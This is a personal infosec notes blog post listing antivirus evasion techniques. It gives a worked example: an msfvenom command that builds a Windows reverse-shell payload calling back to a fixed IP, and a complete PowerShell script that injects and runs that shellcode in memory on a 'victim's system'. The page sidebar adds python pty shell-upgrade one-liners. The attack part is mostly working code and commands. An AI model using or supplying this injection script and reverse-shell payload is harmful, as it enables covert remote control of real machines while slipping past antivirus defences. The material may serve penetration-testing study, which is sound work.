akde/infosec

Information security is ultimately about managing risk

Antivirus evasion techniques

, ,

Short sum­ma­ry of techniques:

  • On-disk eva­sion
    • Pack­ag­ing soft­ware (zip, …)
    • Obfus­ca­tors
    • Crypters
  • In-mem­o­ry evasion 
    • In-mem­o­ry injec­tion / PE injec­tion (Manip­u­lates the processe’s memory) 
      • Remote Process Mem­o­ry Injec­tion (Manip­u­lates anoth­ers processe’s memory)
    • Reflec­tive DLL injec­tion (while nor­mal DLL injec­tion loads a DLL from the disk, reflec­tive DLL injec­tion loads a DLL direct­ly from a processe’s memory.)
    • Process Hol­low­ing (a non-mal­i­cous process is start­ed, sus­pend­ed, then it’s mem­o­ry is over­writ­ten with mal­i­cous code, then resumed)
    • Inline hook­ing (some mem­o­ry is over­writ­ten to jump to mal­i­cous code elsewhere)

Example of a manual In-memory injection

Cre­ate a reverse shell pay­load for PowerShell:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.211 LPORT=443 -f powershell -v sc

Use this Pow­er­Shell script, which injects the shell­code into the own (Pow­er­Shell) process and exe­cutes it in a new thread:

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$var2 = 
  Add-Type -memberDefinition $code -Name "iWin32" -namespace Win32Functions -passthru;

[Byte[]];
[Byte[]]$var1 = SHELLCODE_HERE;

$size = 0x1000;

if ($var1.Length -gt 0x1000) {$size = $var1.Length};

$x = $var2::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($var1.Length-1);$i++) {$var2::memset([IntPtr]($x.ToInt32()+$i), $var1[$i], 1)};

$var2::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };

Start a lis­ten­er and exe­cute it in the vic­tim’s sys­tem via .\a.ps1 (Note: Make sure to exe­cute the right Pow­er­Shell and shell­code for the architecture!)

Example of a automatic In-memory injection with Shelter

Shel­ter can inject shell­code into a binary.

See also inci­dent response train­ing march 2025 , slide advanced5.

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';